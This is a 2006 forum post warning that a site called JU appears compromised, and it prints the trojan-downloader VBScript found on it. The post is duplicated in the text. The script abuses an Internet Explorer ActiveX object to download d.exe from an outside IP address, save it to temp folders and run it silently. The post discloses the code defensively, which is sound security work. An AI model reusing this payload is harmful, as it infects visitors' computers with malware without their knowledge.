Glenn B
September 21st, 2006, 15:06
Just a heads up for those that "might" visit JU.
Some visitors seem to be receiving warnings from their Anti-Virus systems after viewing JU. This does appear to be a valid issue, and their server is likely compromised.
I have sent a PM to Jason (Admin) at JU, and no response as yet. You can see posts about the issue in their support and OT forums.
The issue seems to be either a worm or trojan downloader.
This is part of the code in the file:
a.open "GET", "http://209.200.229.100/~richar8/d.exe",0
That file is hosted at Lunarpages. Here is the account that is probably compromised on their servers: http://aaryn.lunarpages.com/~richar8/ (http://aaryn.lunarpages.com/%7Erichar8/)So JU is likely compromised and is pulling that .exe file from another server client account that is likely compromised.
The file loaded to your PC contains the following code:
(Do NOT try to load the code)
<script language="VBScript">
On Error Resume Next
a=location.href
done = 0
set d = document.createelement("object")
d.setattribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
set a = d.createobject("Microsoft.XMLHTTP","")
set e = d.createobject("Scripting.FileSystemObject","")
set g = d.createobject("Adodb.Stream","")
for i = 0 to 5
if i = 0 then x = "c:\windows\temp" else if i = 1 then x = "c:\temp" else if i = 2 then x = "c:\tmp" else if i = 3 then x = "c:\winnt\temp" else if i = 4 then x = "c:\" end if
h = e.buildpath(x,"\d.exe")
g.type = 1
a.open "GET", "http://209.200.229.100/~richar8/d.exe (http://209.200.229.100/%7Erichar8/d.exe)",0
a.send
g.open
g.write a.responsebody
g.savetofile h,2
g.close
if err.number <> 0 then
Err.Clear
else
set i = d.createobject("shell.application","")
i.shellexecute h,"","","open",0
exit for
End if
next
</script>
Some visitors seem to be receiving warnings from their Anti-Virus systems after viewing JU. This does appear to be a valid issue, and their server is likely compromised.
I have sent a PM to Jason (Admin) at JU, and no response as yet. You can see posts about the issue in their support and OT forums.
The issue seems to be either a worm or trojan downloader.
This is part of the code in the file:
a.open "GET", "http://209.200.229.100/~richar8/d.exe",0
That file is hosted at Lunarpages. Here is the account that is probably compromised on their servers: http://aaryn.lunarpages.com/~richar8/ (http://aaryn.lunarpages.com/%7Erichar8/)So JU is likely compromised and is pulling that .exe file from another server client account that is likely compromised.
The file loaded to your PC contains the following code:
(Do NOT try to load the code)
<script language="VBScript">
On Error Resume Next
a=location.href
done = 0
set d = document.createelement("object")
d.setattribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
set a = d.createobject("Microsoft.XMLHTTP","")
set e = d.createobject("Scripting.FileSystemObject","")
set g = d.createobject("Adodb.Stream","")
for i = 0 to 5
if i = 0 then x = "c:\windows\temp" else if i = 1 then x = "c:\temp" else if i = 2 then x = "c:\tmp" else if i = 3 then x = "c:\winnt\temp" else if i = 4 then x = "c:\" end if
h = e.buildpath(x,"\d.exe")
g.type = 1
a.open "GET", "http://209.200.229.100/~richar8/d.exe (http://209.200.229.100/%7Erichar8/d.exe)",0
a.send
g.open
g.write a.responsebody
g.savetofile h,2
g.close
if err.number <> 0 then
Err.Clear
else
set i = d.createobject("shell.application","")
i.shellexecute h,"","","open",0
exit for
End if
next
</script>